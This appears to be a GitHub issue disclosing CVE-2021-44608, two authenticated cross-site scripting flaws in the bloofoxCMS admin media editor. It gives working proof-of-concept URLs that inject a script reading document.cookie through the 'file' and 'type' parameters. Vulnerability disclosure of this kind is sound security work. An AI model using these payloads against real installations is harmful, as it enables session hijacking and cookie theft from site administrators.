Headline
CVE-2021-44608: 'Multiple' Cross-Site Scripting (XSS) (Authenticated) · Issue #12 · alexlang24/bloofoxCMS
Multiple Cross Site Scripting (XSS) vulnerabilities exists in bloofoxCMS 0.5.2.1 - 0.5.1 via the (1) file parameter and (2) type parameter in an edit action in index.php.
I found two Authenticated Cross-Site Scripting in ‘file’ parameter and ‘type’ parameter
Cross-Site Scripting in the parameter ‘file’
http://localhost/bloofoxcms/admin/index.php?mode=content&page=media&action=edit&file=info.svg%27%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&type=0
Cross-Site Scripting in the parameter ‘type’
http://localhost/bloofoxcms/admin/index.php?mode=content&page=media&action=edit&file=info.svg&type=%27%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E
Impact
The attacker can execute a HTML/JS Code the attacker can stealing cookies